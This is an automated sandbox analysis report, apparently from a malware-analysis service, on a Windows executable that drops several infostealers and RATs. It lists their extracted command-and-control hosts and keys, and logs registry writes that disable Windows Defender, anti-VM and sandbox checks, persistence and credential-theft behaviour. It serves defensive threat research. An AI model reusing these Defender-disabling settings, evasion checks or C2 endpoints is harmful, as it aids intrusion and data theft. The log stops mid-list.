Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
11-12-2024 02:21
Static task
static1
Behavioral task
behavioral1
Sample
2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe
Resource
win10v2004-20241007-en
General
-
Target
2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe
-
Size
1.7MB
-
MD5
c1950c4aafa568b63462b2131c67ceab
-
SHA1
e2aefdf02e7081c1b6bd03affd8d336642388854
-
SHA256
2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb
-
SHA512
24312a48d39d7142ea6b8d49f0c0a95a8661588697e3ec6fd45df5046c83df764549a4f46d0dd732676cbc92468a9c887a75c8681f9c1a9b29fface67df044a9
-
SSDEEP
24576:4M65D66hgGJglzXMwGyAvtUybnqeFC3pDdtmnRt+LDu0QRJmlVJYS2smPl4XwQ89:4f5FhgOgPpWTb1CF7mzKlgpS1AG7Q
Malware Config
Extracted
stealc
stok
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
205.209.109.10:4449
205.209.109.10:7723
clgbfqzkkypxjps
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
lumma
https://impend-differ.biz/api
https://print-vexer.biz/api
https://dare-curbys.biz/api
https://covery-mover.biz/api
https://formy-spill.biz/api
https://dwell-exclaim.biz/api
https://zinc-sneark.biz/api
https://se-blurry.biz/api
Extracted
xworm
5.0
127.0.0.1:8080
101.99.92.189:8080
d5gQ6Zf7Tzih1Pi1
-
install_file
USB.exe
Extracted
lumma
https://covery-mover.biz/api
Signatures
-
Amadey family
-
Asyncrat family
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral2/memory/4960-4349-0x000000000A120000-0x000000000A12E000-memory.dmp disable_win_def -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/memory/4960-666-0x0000000000D80000-0x00000000011F6000-memory.dmp family_xworm behavioral2/memory/4960-665-0x0000000000D80000-0x00000000011F6000-memory.dmp family_xworm -
Gcleaner family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" cedf4c43d4.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection cedf4c43d4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" cedf4c43d4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" cedf4c43d4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" cedf4c43d4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" cedf4c43d4.exe -
Stealc family
-
Xworm family
-
Async RAT payload 2 IoCs
resource yara_rule behavioral2/memory/4428-585-0x00000000006F0000-0x0000000000B52000-memory.dmp family_asyncrat behavioral2/memory/4428-586-0x00000000006F0000-0x0000000000B52000-memory.dmp family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ H3tyh96.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cedf4c43d4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ EBKKKEGIDB.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3EUEYgl.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9feskIx.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2c7ae221a4.exe -
pid Process 3616 powershell.exe 2648 powershell.exe 5540 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts rmqmtw.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3856 msedge.exe 3928 chrome.exe 3060 chrome.exe 1544 msedge.exe 1152 msedge.exe 372 msedge.exe 2356 chrome.exe 4392 chrome.exe 4796 chrome.exe 1444 msedge.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion H3tyh96.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3EUEYgl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion EBKKKEGIDB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion EBKKKEGIDB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2c7ae221a4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9feskIx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cedf4c43d4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cedf4c43d4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion H3tyh96.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3EUEYgl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9feskIx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2c7ae221a4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation 3EUEYgl.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation 9feskIx.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation EBKKKEGIDB.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation skotes.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 2972 cmd.exe 5128 powershell.exe -
Executes dropped EXE 16 IoCs
pid Process 412 EBKKKEGIDB.exe 2168 skotes.exe 3992 Z9Pp9pM.exe 4428 H3tyh96.exe 4744 skotes.exe 2880 yiklfON.exe 2224 3EUEYgl.exe 4960 9feskIx.exe 3904 183faf97c2.exe 3444 cedf4c43d4.exe 5592 2c7ae221a4.exe 6100 e7e85c4f01.exe 6120 skotes.exe 6136 rmqmtw.exe 6092 rmqmtw.exe 5308 rar.exe -
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine H3tyh96.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine cedf4c43d4.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine EBKKKEGIDB.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 2c7ae221a4.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 3EUEYgl.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Wine 9feskIx.exe -
Loads dropped DLL 19 IoCs
pid Process 2256 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe 2256 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe 6092 rmqmtw.exe 6092 rmqmtw.exe 6092 rmqmtw.exe 6092 rmqmtw.exe 6092 rmqmtw.exe 6092 rmqmtw.exe 6092 rmqmtw.exe 6092 rmqmtw.exe 6092 rmqmtw.exe 6092 rmqmtw.exe 6092 rmqmtw.exe 6092 rmqmtw.exe 6092 rmqmtw.exe 6092 rmqmtw.exe 6092 rmqmtw.exe 6092 rmqmtw.exe 6092 rmqmtw.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features cedf4c43d4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" cedf4c43d4.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cedf4c43d4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013884001\\cedf4c43d4.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\183faf97c2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013883001\\183faf97c2.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 265 ip-api.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023d14-672.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 4384 tasklist.exe 3428 tasklist.exe 5940 tasklist.exe 1300 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 2256 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe 412 EBKKKEGIDB.exe 2168 skotes.exe 4428 H3tyh96.exe 4744 skotes.exe 2224 3EUEYgl.exe 4960 9feskIx.exe 3444 cedf4c43d4.exe 5592 2c7ae221a4.exe 6120 skotes.exe -
resource yara_rule behavioral2/files/0x000700000002442b-4321.dat upx behavioral2/memory/6092-4325-0x00007FF8B9E30000-0x00007FF8BA4F2000-memory.dmp upx behavioral2/files/0x000700000002441e-4328.dat upx behavioral2/files/0x0007000000024430-4340.dat upx behavioral2/files/0x000700000002442f-4339.dat upx behavioral2/files/0x000700000002442e-4338.dat upx behavioral2/files/0x000700000002442a-4335.dat upx behavioral2/files/0x0007000000024428-4334.dat upx behavioral2/memory/6092-4332-0x00007FF8D2450000-0x00007FF8D245F000-memory.dmp upx behavioral2/memory/6092-4331-0x00007FF8D0320000-0x00007FF8D0345000-memory.dmp upx behavioral2/files/0x0007000000024429-4330.dat upx behavioral2/memory/6092-4352-0x00007FF8D0230000-0x00007FF8D025C000-memory.dmp upx behavioral2/memory/6092-4355-0x00007FF8CCBC0000-0x00007FF8CCBE4000-memory.dmp upx behavioral2/memory/6092-4354-0x00007FF8BD210000-0x00007FF8BD38F000-memory.dmp upx behavioral2/memory/6092-4361-0x00007FF8CFFE0000-0x00007FF8CFFF9000-memory.dmp upx behavioral2/memory/6092-4381-0x00007FF8D0310000-0x00007FF8D031D000-memory.dmp upx behavioral2/memory/6092-4383-0x00007FF8BD0F0000-0x00007FF8BD20A000-memory.dmp upx behavioral2/memory/6092-4428-0x00007FF8BD210000-0x00007FF8BD38F000-memory.dmp upx behavioral2/memory/6092-4445-0x00007FF8CCBC0000-0x00007FF8CCBE4000-memory.dmp upx behavioral2/memory/6092-4380-0x00007FF8D0320000-0x00007FF8D0345000-memory.dmp upx behavioral2/memory/6092-4379-0x00007FF8CC8A0000-0x00007FF8CC8B4000-memory.dmp upx behavioral2/memory/6092-4378-0x00007FF8BA850000-0x00007FF8BAD83000-memory.dmp upx behavioral2/memory/6092-4371-0x00007FF8BD730000-0x00007FF8BD7FE000-memory.dmp upx behavioral2/memory/6092-4370-0x00007FF8B9E30000-0x00007FF8BA4F2000-memory.dmp upx behavioral2/memory/6092-4363-0x00007FF8D04D0000-0x00007FF8D04DD000-memory.dmp upx behavioral2/memory/6092-4362-0x00007FF8CC8C0000-0x00007FF8CC8F3000-memory.dmp upx behavioral2/memory/6092-4353-0x00007FF8D04F0000-0x00007FF8D0509000-memory.dmp upx behavioral2/memory/6092-4488-0x00007FF8CC8C0000-0x00007FF8CC8F3000-memory.dmp upx behavioral2/memory/6092-4491-0x00007FF8BD730000-0x00007FF8BD7FE000-memory.dmp upx behavioral2/memory/6092-4493-0x00007FF8BA850000-0x00007FF8BAD83000-memory.dmp upx behavioral2/memory/6092-4559-0x00007FF8D0310000-0x00007FF8D031D000-memory.dmp upx behavioral2/memory/6092-4558-0x00007FF8CC8C0000-0x00007FF8CC8F3000-memory.dmp upx behavioral2/memory/6092-4557-0x00007FF8CFFE0000-0x00007FF8CFFF9000-memory.dmp upx behavioral2/memory/6092-4556-0x00007FF8D04D0000-0x00007FF8D04DD000-memory.dmp upx behavioral2/memory/6092-4555-0x00007FF8BD210000-0x00007FF8BD38F000-memory.dmp upx behavioral2/memory/6092-4554-0x00007FF8D04F0000-0x00007FF8D0509000-memory.dmp upx behavioral2/memory/6092-4553-0x00007FF8D0230000-0x00007FF8D025C000-memory.dmp upx behavioral2/memory/6092-4552-0x00007FF8D2450000-0x00007FF8D245F000-memory.dmp upx behavioral2/memory/6092-4551-0x00007FF8D0320000-0x00007FF8D0345000-memory.dmp upx behavioral2/memory/6092-4550-0x00007FF8CCBC0000-0x00007FF8CCBE4000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job EBKKKEGIDB.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 2788 2880 WerFault.exe 142 1740 5592 WerFault.exe 179 -
System Location Discovery: System Language Discovery 1 TTPs 21 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 183faf97c2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cedf4c43d4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e7e85c4f01.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EBKKKEGIDB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9feskIx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2c7ae221a4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3EUEYgl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 183faf97c2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language H3tyh96.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 183faf97c2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Z9Pp9pM.exe -
Checks processor information in registry 2 TTPs 15 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3EUEYgl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3EUEYgl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2972 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4508 WMIC.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 5732 systeminfo.exe -
Kills process with taskkill 14 IoCs
pid Process 3568 taskkill.exe 4436 taskkill.exe 2384 taskkill.exe 1612 taskkill.exe 5496 taskkill.exe 1580 taskkill.exe 4696 taskkill.exe 5584 taskkill.exe 2272 taskkill.exe 920 taskkill.exe 4412 taskkill.exe 1948 taskkill.exe 4944 taskkill.exe 5432 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133783572818411482" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings firefox.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4960 9feskIx.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2256 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe 2256 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe 2256 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe 2256 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe 2256 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe 2256 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe 3928 chrome.exe 3928 chrome.exe 2256 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe 2256 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe 2256 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe 2256 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe 1292 msedge.exe 1292 msedge.exe 1292 msedge.exe 1292 msedge.exe 736 msedge.exe 736 msedge.exe 1544 msedge.exe 1544 msedge.exe 2256 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe 2256 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe 2256 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe 2256 2ed1e1e632568e8c6ea61bc3d528edfc381be9720a145265e56e0190578723fb.exe 412 EBKKKEGIDB.exe 412 EBKKKEGIDB.exe 2168 skotes.exe 2168 skotes.exe 4428 H3tyh96.exe 4428 H3tyh96.exe 4428 H3tyh96.exe 4428 H3tyh96.exe 4744 skotes.exe 4744 skotes.exe 2224 3EUEYgl.exe 2224 3EUEYgl.exe 2224 3EUEYgl.exe 2224 3EUEYgl.exe 4960 9feskIx.exe 4960 9feskIx.exe 4428 H3tyh96.exe 3904 183faf97c2.exe 3904 183faf97c2.exe 3444 cedf4c43d4.exe 3444 cedf4c43d4.exe 3444 cedf4c43d4.exe 3444 cedf4c43d4.exe 3444 cedf4c43d4.exe 3904 183faf97c2.exe 3904 183faf97c2.exe 5592 2c7ae221a4.exe 5592 2c7ae221a4.exe 4960 9feskIx.exe 4960 9feskIx.exe 4428 H3tyh96.exe 4428 H3tyh96.exe 6120 skotes.exe 6120 skotes.exe 4428 H3tyh96.exe 4960 9feskIx.exe 3616 powershell.exe 3616 powershell.exe 3616 powershell.exe 5540 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 3928 chrome.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe 1544 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeShutdownPrivilege 3928 chrome.exe Token: SeCreatePagefilePrivilege 3928 chrome.exe Token: SeDebugPrivilege 4428 H3tyh96.exe Token: SeDebugPrivilege 2384 taskkill.exe Token: SeDebugPrivilege 1612 taskkill.exe Token: SeDebugPrivilege 4696 taskkill.exe Token: SeDebugPrivilege 920 taskkill.exe Token: SeDebugPrivilege 4412 taskkill.exe Token: SeDebugPrivilege 64 firefox.exe Token: SeDebugPrivilege 64 firefox.exe Token: SeDebugPrivilege 3444 cedf4c43d4.exe Token: SeDebugPrivilege 4960 9feskIx.exe Token: SeDebugPrivilege 3616 powershell.exe Token: SeDebugPrivilege 5540 powershell.exe Token: SeDebugPrivilege 3428 tasklist.exe Token: SeDebugPrivilege 4384 tasklist.exe Token: SeIncreaseQuotaPrivilege 5456 WMIC.exe Token: SeSecurityPrivilege 5456 WMIC.exe Token: SeTakeOwnershipPrivilege 5456 WMIC.exe Token: SeLoadDriverPrivilege 5456 WMIC.exe Token: SeSystemProfilePrivilege 5456 WMIC.exe Token: SeSystemtimePrivilege 5456 WMIC.exe Token: SeProfSingleProcessPrivilege 5456 WMIC.exe Token: SeIncBasePriorityPrivilege 5456 WMIC.exe Token: SeCreatePagefilePrivilege 5456 WMIC.exe Token: SeBackupPrivilege 5456 WMIC.exe Token: SeRestorePrivilege 5456 WMIC.exe Token: SeShutdownPrivilege 5456 WMIC.exe Token: SeDebugPrivilege 5456 WMIC.exe Token: SeSystemEnvironmentPrivilege 5456 WMIC.exe Token: SeRemoteShutdownPrivilege 5456 WMIC.exe Token: SeUndockPrivilege 5456 WMIC.exe Token: SeManageVolumePrivilege 5456 WMIC.exe Token: 33 5456 WMIC.exe Token: 34 5456 WMIC.exe Token: 35 5456 WMIC.exe Token: 36 5456 WMIC.exe Token: SeDebugPrivilege 5940 tasklist.exe Token: SeDebugPrivilege 5128 powershell.exe Token: SeIncreaseQuotaPrivilege 5456 WMIC.exe Token: SeSecurityPrivilege 5456 WMIC.exe Token: SeTakeOwnershipPrivilege 5456 WMIC.exe Token: SeLoadDriverPrivilege 5456 WMIC.exe Token: SeSystemProfilePrivilege 5456 WMIC.exe Token: SeSystemtimePrivilege 5456 WMIC.exe Token: 